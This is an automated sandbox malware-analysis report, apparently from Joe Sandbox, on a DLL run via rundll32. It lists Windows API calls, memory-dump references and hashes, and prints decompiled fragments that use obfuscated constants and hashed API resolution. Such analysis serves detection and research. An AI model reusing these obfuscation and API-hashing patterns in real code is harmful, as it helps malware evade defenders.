                                                                                                                                                            • Instruction Fuzzy Hash: 18E14974A00209DFEB48CF94C990AAEB7F6FF88340F208559E905AB359DB75AD42CF50
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            control_flow_graph 110 10006a90-10006aab call 1002f9a6 113 10006ab7-10012570 110->113 114 10006aad-10006ab2 110->114 116 10012584-1001258b 113->116 115 100125b4-100125b8 114->115 117 10012597-1001259b call 1002fa69 116->117 118 1001258d-10012595 116->118 121 100125a0-100125a9 117->121 118->116 122 100125ab-100125ad 121->122 123 100125af 121->123 122->115 123->115
                                                                                                                                                            APIs
                                                                                                                                                            • _malloc.LIBCMT ref: 10006A9C
                                                                                                                                                              • Part of subcall function 1002F9A6: __FF_MSGBANNER.LIBCMT ref: 1002F9C9
                                                                                                                                                              • Part of subcall function 1002F9A6: __NMSG_WRITE.LIBCMT ref: 1002F9D0
                                                                                                                                                              • Part of subcall function 1002F9A6: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,1003580D,?,00000001,00000001,10035A23,00000018,10050CC8,0000000C,10035AB2,00000001), ref: 1002FA1E
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 0000000B.00000002.532303320.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                            • Associated: 0000000B.00000002.532295709.0000000010000000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                            • Associated: 0000000B.00000002.532368497.0000000010046000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                            • Associated: 0000000B.00000002.532385736.0000000010053000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                            • Associated: 0000000B.00000002.532394465.0000000010057000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                            • Associated: 0000000B.00000002.532402551.000000001005A000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: AllocateHeap_malloc
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 501242067-0
                                                                                                                                                            • Opcode ID: ab67eba576b62ed2242e6049fa4a9f00a0283ae289beaf397465af8560d1c9fc
                                                                                                                                                            • Instruction ID: 7622b3071c216813c8acba396ad13572c3e9674cac4916c3917d4934f1ce5c91
                                                                                                                                                            • Opcode Fuzzy Hash: ab67eba576b62ed2242e6049fa4a9f00a0283ae289beaf397465af8560d1c9fc
                                                                                                                                                            • Instruction Fuzzy Hash: BF844072D0002ECFCF08DFECCA959EEFBB5FF68204B169259D425BB294C6356A11CA54
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            APIs
                                                                                                                                                            • EnterCriticalSection.KERNEL32(100575E0,?,?,?,?,100575C4,10020C7A,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139,00000004), ref: 1002084A
                                                                                                                                                            • GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,100575C4,10020C7A,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139), ref: 100208A0
                                                                                                                                                            • GlobalHandle.KERNEL32(003B7AD0), ref: 100208A9
                                                                                                                                                            • GlobalUnlock.KERNEL32(00000000,?,?,?,?,100575C4,10020C7A,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139,00000004), ref: 100208B2
                                                                                                                                                            • GlobalReAlloc.KERNEL32(00000000,00000000,00002002), ref: 100208C9
                                                                                                                                                            • GlobalHandle.KERNEL32(003B7AD0), ref: 100208DB
                                                                                                                                                            • GlobalLock.KERNEL32 ref: 100208E2
                                                                                                                                                            • LeaveCriticalSection.KERNEL32(?,?,?,?,?,100575C4,10020C7A,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139,00000004), ref: 100208EC
                                                                                                                                                            • GlobalLock.KERNEL32 ref: 100208F8
                                                                                                                                                            • _memset.LIBCMT ref: 10020911
                                                                                                                                                            • LeaveCriticalSection.KERNEL32(?), ref: 1002093D
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 0000000B.00000002.532303320.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                            • Associated: 0000000B.00000002.532295709.0000000010000000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                            • Associated: 0000000B.00000002.532368497.0000000010046000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                            • Associated: 0000000B.00000002.532385736.0000000010053000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                            • Associated: 0000000B.00000002.532394465.0000000010057000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                            • Associated: 0000000B.00000002.532402551.000000001005A000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Global$CriticalSection$AllocHandleLeaveLock$EnterUnlock_memset
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 496899490-0
                                                                                                                                                            • Opcode ID: 23a5f943a2514d5899e1dc1f035ea6f74369b98ac7016ed06c6f01df95d95d17
                                                                                                                                                            • Instruction ID: dc14c853345dee55639cdae2a1fd03b11c2696e398e705256622f09b1856cd91
                                                                                                                                                            • Opcode Fuzzy Hash: 23a5f943a2514d5899e1dc1f035ea6f74369b98ac7016ed06c6f01df95d95d17
                                                                                                                                                            • Instruction Fuzzy Hash: 08319C75600715AFE324CF24DD88A1AB7EAEB49241B01492AF996C3662EB71F8448B50
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            APIs
                                                                                                                                                            • __lock.LIBCMT ref: 1002FA87
                                                                                                                                                              • Part of subcall function 10035A99: __mtinitlocknum.LIBCMT ref: 10035AAD
                                                                                                                                                              • Part of subcall function 10035A99: __amsg_exit.LIBCMT ref: 10035AB9
                                                                                                                                                              • Part of subcall function 10035A99: EnterCriticalSection.KERNEL32(00000001,00000001,?,10035387,0000000D,10050C60,00000008,10035479,00000001,?,?,00000001,?,?,10030C69,00000001), ref: 10035AC1
                                                                                                                                                            • ___sbh_find_block.LIBCMT ref: 1002FA92
                                                                                                                                                            • ___sbh_free_block.LIBCMT ref: 1002FAA1
                                                                                                                                                            • HeapFree.KERNEL32(00000000,?,10050988), ref: 1002FAD1
                                                                                                                                                            • GetLastError.KERNEL32(?,1003580D,?,00000001,00000001,10035A23,00000018,10050CC8,0000000C,10035AB2,00000001,00000001,?,10035387,0000000D,10050C60), ref: 1002FAE2
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 0000000B.00000002.532303320.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                            • Associated: 0000000B.00000002.532295709.0000000010000000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                            • Associated: 0000000B.00000002.532368497.0000000010046000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                            • Associated: 0000000B.00000002.532385736.0000000010053000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                            • Associated: 0000000B.00000002.532394465.0000000010057000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                            • Associated: 0000000B.00000002.532402551.000000001005A000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2714421763-0
                                                                                                                                                            • Opcode ID: dc462893557a6a2c1efb59ab9fc79b5cbceadcecec0e23dee2ff352f2dee75c2
                                                                                                                                                            • Instruction ID: c59143bfe651e608972d8f734a12067a167937505bca417355bd9d82aad263b9
                                                                                                                                                            • Opcode Fuzzy Hash: dc462893557a6a2c1efb59ab9fc79b5cbceadcecec0e23dee2ff352f2dee75c2
                                                                                                                                                            • Instruction Fuzzy Hash: 3D012BB5904316AEEB11DFB0EC05B9D7BB4EF013D2F50412DF008AE091DB35A840DB92
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            control_flow_graph 235 10036624-10036642 HeapCreate 236 10036647-10036654 call 100365c9 235->236 237 10036644-10036646 235->237 240 10036656-10036663 call 10035aca 236->240 241 1003667a-1003667d 236->241 240->241 244 10036665-10036678 HeapDestroy 240->244 244->237
                                                                                                                                                            APIs
                                                                                                                                                            • HeapCreate.KERNELBASE(00000000,00001000,00000000,10030AEB,00000001,?,?,00000001,?,?,10030C69,00000001,?,?,10050A28,0000000C), ref: 10036635
                                                                                                                                                            • HeapDestroy.KERNEL32(?,?,00000001,?,?,10030C69,00000001,?,?,10050A28,0000000C,10030D23,?), ref: 1003666B
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 0000000B.00000002.532303320.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                            • Associated: 0000000B.00000002.532295709.0000000010000000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                            • Associated: 0000000B.00000002.532368497.0000000010046000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                            • Associated: 0000000B.00000002.532385736.0000000010053000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                            • Associated: 0000000B.00000002.532394465.0000000010057000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                            • Associated: 0000000B.00000002.532402551.000000001005A000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Heap$CreateDestroy
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 3296620671-0
                                                                                                                                                            • Opcode ID: d3c419273cfe47b5decc93e2e70dd510a49122bb40b3ad2795d27682d43cbdf9
                                                                                                                                                            • Instruction ID: 5adf962be877c1470e25a5b203e63be93066c2f5666ac54c72bc9e0dfe65a95a
                                                                                                                                                            • Opcode Fuzzy Hash: d3c419273cfe47b5decc93e2e70dd510a49122bb40b3ad2795d27682d43cbdf9
                                                                                                                                                            • Instruction Fuzzy Hash: 22E06D706103519EFB139B30CE8A33539F8FB5878BF008869F405C80A0FBA08840AA15
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            control_flow_graph 245 100019c0-100019ee 246 10001a02-10001a0e 245->246 247 10001a14-10001a1b 246->247 248 10001b06 246->248 249 10001a83-10001a9e call 10001990 247->249 250 10001a1d-10001a2a 247->250 251 10001b0b-10001b0e 248->251 260 10001aa0-10001aa2 249->260 261 10001aa4-10001ac9 VirtualAlloc 249->261 253 10001a2c-10001a4e VirtualAlloc 250->253 254 10001a7e 250->254 257 10001a50-10001a52 253->257 258 10001a57-10001a7b call 100017c0 253->258 254->246 257->251 258->254 260->251 263 10001acb-10001acd 261->263 264 10001acf-10001afe call 10001810 261->264 263->251 264->248
                                                                                                                                                            APIs
                                                                                                                                                            • VirtualAlloc.KERNEL32(4D8B0000,00000000,00001000,00000004,?,1000257F,00000000), ref: 10001A41
                                                                                                                                                            • VirtualAlloc.KERNELBASE(4D8B0000,8B118BBC,00001000,00000004,10012839,8B118BBC,?,1000257F,00000000,10012839,?), ref: 10001ABC
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 0000000B.00000002.532303320.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                            • Associated: 0000000B.00000002.532295709.0000000010000000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                            • Associated: 0000000B.00000002.532368497.0000000010046000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                            • Associated: 0000000B.00000002.532385736.0000000010053000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                            • Associated: 0000000B.00000002.532394465.0000000010057000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                            • Associated: 0000000B.00000002.532402551.000000001005A000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: AllocVirtual
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 4275171209-0
                                                                                                                                                            • Opcode ID: 095274eb58cefc7da223eb8c3e93af1acb0495bf3fbc764276b25f8f0a8074d8
                                                                                                                                                            • Instruction ID: bcee95509f27266f5ca249dd7f6d6a0ca5035efccc592cd1fda7edfbe35d51d4
                                                                                                                                                            • Opcode Fuzzy Hash: 095274eb58cefc7da223eb8c3e93af1acb0495bf3fbc764276b25f8f0a8074d8
                                                                                                                                                            • Instruction Fuzzy Hash: 0D51D9B4A0010AEFDB04CF94C991AAEB7F5FF48344F248599E905AB345D770EE91CBA1
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            • Executed
                                                                                                                                                            • Not Executed
                                                                                                                                                            control_flow_graph 275 277f5d-277ff1 call 2820b9 call 28aa30 CreateProcessW
                                                                                                                                                            APIs
                                                                                                                                                            • CreateProcessW.KERNEL32(?,?,00000000,00000000,?,00000000,00000000,00000000,?,0027AD99,?,?,?,181C8C04,0027AD99), ref: 00277FEB
                                                                                                                                                            Memory Dump Source
• Source File: 0000000B.00000002.531894160.0000000000271000.00000020.00000800.00020000.00000000.sdmp, Offset: 00270000, based on PE: true
• Associated: 0000000B.00000002.531885698.0000000000270000.00000004.00000800.00020000.00000000.sdmp
• Associated: 0000000B.00000002.532098022.0000000000293000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_11_2_270000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: CreateProcess
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 963392458-0
                                                                                                                                                            • Opcode ID: f75a7139c89005ad41842e885698baffe79ed174033219a517191554fa823b18
                                                                                                                                                            • Instruction ID: 950fa76770937ccfe08a4f48f26393eaf284fdb27e50b3a75c8c3e31513af41e
                                                                                                                                                            • Opcode Fuzzy Hash: f75a7139c89005ad41842e885698baffe79ed174033219a517191554fa823b18
                                                                                                                                                            • Instruction Fuzzy Hash: 4811D376402128BBDF61AFD1DD09CEF7F79EF093A4F149144FA1921121D2768A60EBA1
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            • Executed
                                                                                                                                                            • Not Executed
                                                                                                                                                            control_flow_graph 280 2846bb-28473b call 2820b9 call 28aa30 SHGetFolderPathW
                                                                                                                                                            C-Code - Quality: 58%
                                                                                                                                                            			E002846BB(intOrPtr __ecx, void* __edx, intOrPtr _a4, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
                                                                                                                                                            				signed int _v8;
                                                                                                                                                            				signed int _v12;
                                                                                                                                                            				intOrPtr _v16;
                                                                                                                                                            				intOrPtr _v20;
                                                                                                                                                            				void* _t21;
                                                                                                                                                            				intOrPtr* _t25;
                                                                                                                                                            				void* _t26;
                                                                                                                                                            
                                                                                                                                                            				E002820B9(_t21);
                                                                                                                                                            				_v20 = 0x3f5bb0;
                                                                                                                                                            				_v16 = 0;
                                                                                                                                                            				_v12 = 0x996874;
                                                                                                                                                            				_v12 = _v12 << 0xf;
                                                                                                                                                            				_v12 = _v12 ^ 0xb43bad9d;
                                                                                                                                                            				_v8 = 0xebf0af;
                                                                                                                                                            				_v8 = _v8 ^ 0x3b7dcb24;
                                                                                                                                                            				_v8 = _v8 ^ 0x3b96d1fd;
                                                                                                                                                            				_t25 = E0028AA30(0x220, 0xdf0d4f1a, __ecx, 0x54d725f);
                                                                                                                                                            				_t26 =  *_t25(0, _a24, 0, 0, _a4, __ecx, __edx, _a4, 0, 0, 0, _a20, _a24, _a28); // executed
                                                                                                                                                            				return _t26;
                                                                                                                                                            			}











                                                                                                                                                            APIs
                                                                                                                                                            • SHGetFolderPathW.SHELL32(00000000,?,00000000,00000000,B43BAD9D), ref: 00284735
                                                                                                                                                            Memory Dump Source
• Source File: 0000000B.00000002.531894160.0000000000271000.00000020.00000800.00020000.00000000.sdmp, Offset: 00270000, based on PE: true
• Associated: 0000000B.00000002.531885698.0000000000270000.00000004.00000800.00020000.00000000.sdmp
• Associated: 0000000B.00000002.532098022.0000000000293000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_11_2_270000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: FolderPath
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1514166925-0
                                                                                                                                                            • Opcode ID: 618a3ba0faaefa928059a11cdf791cf9449ddf75a1a0986f9704d06953ed0748
                                                                                                                                                            • Instruction ID: 4c47160fae029644297bf4164f7061c0ecb0f39fc22cd84a0016dfb846d49a74
                                                                                                                                                            • Opcode Fuzzy Hash: 618a3ba0faaefa928059a11cdf791cf9449ddf75a1a0986f9704d06953ed0748
                                                                                                                                                            • Instruction Fuzzy Hash: 5701EC75802218BBCF15AFD5DC498DFBFB8EF45394F108145F91866211D2758A60DBD1
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            • Executed
                                                                                                                                                            • Not Executed
                                                                                                                                                            control_flow_graph 285 2793ed-279461 call 28aa30 ExitProcess
                                                                                                                                                            C-Code - Quality: 73%
                                                                                                                                                            			E002793ED() {
                                                                                                                                                            				signed int _v8;
                                                                                                                                                            				signed int _v12;
                                                                                                                                                            				void* _v24;
                                                                                                                                                            				intOrPtr _v28;
                                                                                                                                                            				intOrPtr _t24;
                                                                                                                                                            
                                                                                                                                                            				_v28 = 0xda6c64;
                                                                                                                                                            				asm("stosd");
                                                                                                                                                            				asm("stosd");
                                                                                                                                                            				asm("stosd");
                                                                                                                                                            				_v12 = 0x88a564;
                                                                                                                                                            				_v12 = _v12 | 0x9bf5ed5c;
                                                                                                                                                            				_v12 = _v12 ^ 0x9bf17c37;
                                                                                                                                                            				_v8 = 0xd9241f;
                                                                                                                                                            				_v8 = _v8 * 0x5c;
                                                                                                                                                            				_v8 = _v8 + 0xccdd;
                                                                                                                                                            				_v8 = _v8 + 0x903;
                                                                                                                                                            				_v8 = _v8 ^ 0x4e0c4bb2;
                                                                                                                                                            				E0028AA30(0x1d2, 0x9df7cc0d, _t24, 0x98a8878d);
                                                                                                                                                            				ExitProcess(0);
                                                                                                                                                            			}









                                                                                                                                                            APIs
                                                                                                                                                            • ExitProcess.KERNELBASE(00000000), ref: 0027945B
                                                                                                                                                            Memory Dump Source
• Source File: 0000000B.00000002.531894160.0000000000271000.00000020.00000800.00020000.00000000.sdmp, Offset: 00270000, based on PE: true
• Associated: 0000000B.00000002.531885698.0000000000270000.00000004.00000800.00020000.00000000.sdmp
• Associated: 0000000B.00000002.532098022.0000000000293000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_11_2_270000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: ExitProcess
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 621844428-0
                                                                                                                                                            • Opcode ID: d0c754f3adca9a80957f35e1c78ce5c07ecf17b0c35f9d329434f55f6d35f6b1
                                                                                                                                                            • Instruction ID: 41e3f3a649c1c770c3589a49e8dad32910a6bb4acab3e2206ca78253d98dc695
                                                                                                                                                            • Opcode Fuzzy Hash: d0c754f3adca9a80957f35e1c78ce5c07ecf17b0c35f9d329434f55f6d35f6b1
                                                                                                                                                            • Instruction Fuzzy Hash: 90F03C71901308FBEB04DBE8DA4699DFBB4EB50314F2081A9D604B3261E7745F459B91
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            • Executed
                                                                                                                                                            • Not Executed
                                                                                                                                                            control_flow_graph 305 27b23c-27b2c6 call 2820b9 call 28aa30 lstrcmpiW
                                                                                                                                                            C-Code - Quality: 58%
                                                                                                                                                            			E0027B23C(intOrPtr __ecx, void* __edx, WCHAR* _a4, intOrPtr _a8, intOrPtr _a12, WCHAR* _a16) {
                                                                                                                                                            				signed int _v8;
                                                                                                                                                            				signed int _v12;
                                                                                                                                                            				void* _t27;
                                                                                                                                                            				int _t32;
                                                                                                                                                            
                                                                                                                                                            				_push(__ecx);
                                                                                                                                                            				_push(__ecx);
                                                                                                                                                            				_push(_a16);
                                                                                                                                                            				_push(_a12);
                                                                                                                                                            				_push(_a8);
                                                                                                                                                            				_push(_a4);
                                                                                                                                                            				_push(__ecx);
                                                                                                                                                            				E002820B9(_t27);
                                                                                                                                                            				_v12 = 0x6268;
                                                                                                                                                            				_v12 = _v12 ^ 0x57e834c3;
                                                                                                                                                            				_v12 = _v12 + 0xffff2919;
                                                                                                                                                            				_v12 = _v12 + 0xffff3e3d;
                                                                                                                                                            				_v12 = _v12 ^ 0x57e9dc2b;
                                                                                                                                                            				_v8 = 0xa46433;
                                                                                                                                                            				_v8 = _v8 + 0x98ba;
                                                                                                                                                            				_v8 = _v8 | 0xc390ebe9;
                                                                                                                                                            				_v8 = _v8 + 0xd5b0;
                                                                                                                                                            				_v8 = _v8 ^ 0xc3bab866;
                                                                                                                                                            				E0028AA30(0xb5, 0x9df7cc0d, __ecx, 0xaca78213);
                                                                                                                                                            				_t32 = lstrcmpiW(_a16, _a4); // executed
                                                                                                                                                            				return _t32;
                                                                                                                                                            			}








                                                                                                                                                            APIs
                                                                                                                                                            • lstrcmpiW.KERNELBASE(EE1E6DE5,57E9DC2B), ref: 0027B2C1
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 0000000B.00000002.531894160.0000000000271000.00000020.00000800.00020000.00000000.sdmp, Offset: 00270000, based on PE: true
                                                                                                                                                            • Associated: 0000000B.00000002.531885698.0000000000270000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                                            • Associated: 0000000B.00000002.532098022.0000000000293000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_11_2_270000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: lstrcmpi
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1586166983-0
                                                                                                                                                            • Opcode ID: 26884a22f0da7bc497ec3f8ef604453e7fb46fa0b929fe200322ee9dcdc91410
                                                                                                                                                            • Instruction ID: 15794418453f5d9b48416b83e33238ef218e77120e0968befb57974a09bd7515
                                                                                                                                                            • Opcode Fuzzy Hash: 26884a22f0da7bc497ec3f8ef604453e7fb46fa0b929fe200322ee9dcdc91410
                                                                                                                                                            • Instruction Fuzzy Hash: 66015A72C00208FFDF45DFD4DD468AEBB71EB40300F108088B90562152E3714B609B51
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%